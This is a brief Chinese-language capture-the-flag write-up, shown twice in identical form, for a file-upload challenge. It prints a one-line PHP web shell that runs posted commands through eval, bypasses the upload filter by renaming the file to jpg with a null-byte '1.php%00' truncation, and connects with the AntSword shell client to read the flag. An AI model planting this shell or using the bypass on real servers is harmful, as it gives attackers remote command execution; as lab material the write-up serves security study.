开启题目
查看页面源代码,发现接受值是 get
1.php内容:
<?php @eval($_POST[cmd]);?>
上传一句话木马 1.php,抓包,修改后缀为 jpg,添加 1.php%00
然后放包,上传成功
蚁剑连接
在“/var/www/html/flag_177321091.php”找到了 flag
开启题目
查看页面源代码,发现接受值是 get
1.php内容:
<?php @eval($_POST[cmd]);?>
上传一句话木马 1.php,抓包,修改后缀为 jpg,添加 1.php%00
然后放包,上传成功
蚁剑连接
在“/var/www/html/flag_177321091.php”找到了 flag